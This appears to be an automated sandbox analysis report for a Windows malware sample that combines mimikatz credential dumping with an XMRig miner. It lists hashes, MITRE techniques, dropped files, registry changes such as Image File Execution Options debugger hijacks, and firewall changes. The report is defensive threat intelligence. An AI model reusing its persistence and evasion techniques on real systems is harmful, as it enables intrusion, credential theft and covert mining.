mimikatz | 4f694e86f8470e67a33f914c18cb4ac24930375443f904ff7d1e566dde3c42be

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27-10-2024 09:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-10-27_70fc9e9c8c26a53ec2c191120956ea0d_hacktools_icedid_mimikatz.exe
Size

7.1MB
MD5

70fc9e9c8c26a53ec2c191120956ea0d
SHA1

e34c2e0ede8def84cbe5385c1b6448a954b17750
SHA256

4f694e86f8470e67a33f914c18cb4ac24930375443f904ff7d1e566dde3c42be
SHA512

3d3df0893e7492fd1d5a6fccc672128bec8683a8227bf1bc4a1f677b409a0d6fedf2164164e35af31e31780f5b7a5a937b5da0acd0ec6f548b6315903cf3054b
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3632 created 2140	3632	pnreyic.exe	38

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (28364) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/1908-178-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	xmrig
behavioral2/memory/1908-182-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	xmrig
behavioral2/memory/1908-200-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	xmrig
behavioral2/memory/1908-212-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	xmrig
behavioral2/memory/1908-221-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	xmrig
behavioral2/memory/1908-232-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	xmrig
behavioral2/memory/1908-249-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	xmrig
behavioral2/memory/1908-257-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	xmrig
behavioral2/memory/1908-268-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	xmrig
behavioral2/memory/1908-377-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	xmrig
behavioral2/memory/1908-378-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	xmrig
behavioral2/memory/1908-381-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/1752-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/1752-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x0007000000023cb1-6.dat	mimikatz
behavioral2/memory/372-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/2424-138-0x00007FF759D00000-0x00007FF759DEE000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	pnreyic.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	pnreyic.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1164	netsh.exe
1564	netsh.exe

Executes dropped EXE 29 IoCs

pid	Process
372	pnreyic.exe
3632	pnreyic.exe
4580	wpcap.exe
1020	ttsqkuccf.exe
2424	vfshost.exe
4144	cntrtrctt.exe
4948	xohudmc.exe
3836	gykgue.exe
1908	zergmt.exe
2488	cntrtrctt.exe
524	cntrtrctt.exe
3288	cntrtrctt.exe
4792	cntrtrctt.exe
728	cntrtrctt.exe
1252	cntrtrctt.exe
3284	cntrtrctt.exe
3044	cntrtrctt.exe
4060	cntrtrctt.exe
312	cntrtrctt.exe
4508	cntrtrctt.exe
3972	cntrtrctt.exe
3276	cntrtrctt.exe
3300	cntrtrctt.exe
1264	cntrtrctt.exe
3732	cntrtrctt.exe
3644	cntrtrctt.exe
2968	pnreyic.exe
2232	ncgcflyve.exe
5516	pnreyic.exe

Loads dropped DLL 12 IoCs

pid	Process
4580	wpcap.exe
4580	wpcap.exe
4580	wpcap.exe
4580	wpcap.exe
4580	wpcap.exe
4580	wpcap.exe
4580	wpcap.exe
4580	wpcap.exe
4580	wpcap.exe
1020	ttsqkuccf.exe
1020	ttsqkuccf.exe
1020	ttsqkuccf.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
77	ifconfig.me
78	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	pnreyic.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\gykgue.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF	pnreyic.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	pnreyic.exe
File created	C:\Windows\SysWOW64\gykgue.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF	pnreyic.exe

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023d02-134.dat	upx
behavioral2/memory/2424-135-0x00007FF759D00000-0x00007FF759DEE000-memory.dmp	upx
behavioral2/memory/2424-138-0x00007FF759D00000-0x00007FF759DEE000-memory.dmp	upx
behavioral2/files/0x0007000000023d0d-141.dat	upx
behavioral2/memory/4144-142-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/4144-160-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/files/0x0007000000023d0a-164.dat	upx
behavioral2/memory/1908-165-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	upx
behavioral2/memory/2488-171-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/524-175-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/1908-178-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	upx
behavioral2/memory/3288-180-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/1908-182-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	upx
behavioral2/memory/4792-185-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/728-189-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/1252-193-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/3284-197-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/1908-200-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	upx
behavioral2/memory/3044-202-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/4060-206-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/312-210-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/1908-212-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	upx
behavioral2/memory/4508-215-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/3972-219-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/1908-221-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	upx
behavioral2/memory/3276-224-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/3300-228-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/1264-231-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/1908-232-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	upx
behavioral2/memory/3732-234-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/3644-236-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp	upx
behavioral2/memory/1908-249-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	upx
behavioral2/memory/1908-257-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	upx
behavioral2/memory/1908-268-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	upx
behavioral2/memory/1908-377-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	upx
behavioral2/memory/1908-378-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	upx
behavioral2/memory/1908-381-0x00007FF629280000-0x00007FF6293A0000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\nblmptktz\etgfqftjv\wpcap.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\cnli-1.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\exma-1.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\libxml2.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\schoedcl.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\Corporate\mimilib.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\etgfqftjv\scan.bat	pnreyic.exe
File created	C:\Windows\nblmptktz\etgfqftjv\ncgcflyve.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\posh-0.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\tibe-2.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\svschost.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\spoolsrv.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\zlib1.dll	pnreyic.exe
File opened for modification	C:\Windows\nblmptktz\Corporate\log.txt	cmd.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\vimpcsvc.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\spoolsrv.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\tucl-1.dll	pnreyic.exe
File created	C:\Windows\hrmeszcf\schoedcl.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\ucl.dll	pnreyic.exe
File created	C:\Windows\hrmeszcf\docmicfg.xml	pnreyic.exe
File opened for modification	C:\Windows\hrmeszcf\svschost.xml	pnreyic.exe
File created	C:\Windows\ime\pnreyic.exe	pnreyic.exe
File opened for modification	C:\Windows\hrmeszcf\pnreyic.exe	2024-10-27_70fc9e9c8c26a53ec2c191120956ea0d_hacktools_icedid_mimikatz.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\crli-0.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\schoedcl.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\vimpcsvc.xml	pnreyic.exe
File opened for modification	C:\Windows\nblmptktz\etgfqftjv\Packet.dll	pnreyic.exe
File opened for modification	C:\Windows\hrmeszcf\spoolsrv.xml	pnreyic.exe
File opened for modification	C:\Windows\hrmeszcf\docmicfg.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\etgfqftjv\Packet.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\svschost.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\spoolsrv.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\svschost.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\AppCapture64.dll	pnreyic.exe
File created	C:\Windows\hrmeszcf\pnreyic.exe	2024-10-27_70fc9e9c8c26a53ec2c191120956ea0d_hacktools_icedid_mimikatz.exe
File created	C:\Windows\nblmptktz\UnattendGC\docmicfg.xml	pnreyic.exe
File created	C:\Windows\hrmeszcf\svschost.xml	pnreyic.exe
File created	C:\Windows\hrmeszcf\vimpcsvc.xml	pnreyic.exe
File opened for modification	C:\Windows\hrmeszcf\schoedcl.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\coli-0.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\docmicfg.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\Corporate\vfshost.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\Corporate\mimidrv.sys	pnreyic.exe
File created	C:\Windows\nblmptktz\etgfqftjv\ip.txt	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\docmicfg.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\schoedcl.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\etgfqftjv\wpcap.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\trch-1.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\trfo-2.dll	pnreyic.exe
File created	C:\Windows\hrmeszcf\spoolsrv.xml	pnreyic.exe
File opened for modification	C:\Windows\hrmeszcf\vimpcsvc.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\Shellcode.ini	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\AppCapture32.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\upbdrjv\swrpwe.exe	pnreyic.exe
File opened for modification	C:\Windows\nblmptktz\etgfqftjv\Result.txt	ncgcflyve.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\libeay32.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\ssleay32.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\xdvl-0.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\vimpcsvc.xml	pnreyic.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3124	sc.exe
1628	sc.exe
4824	sc.exe
968	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
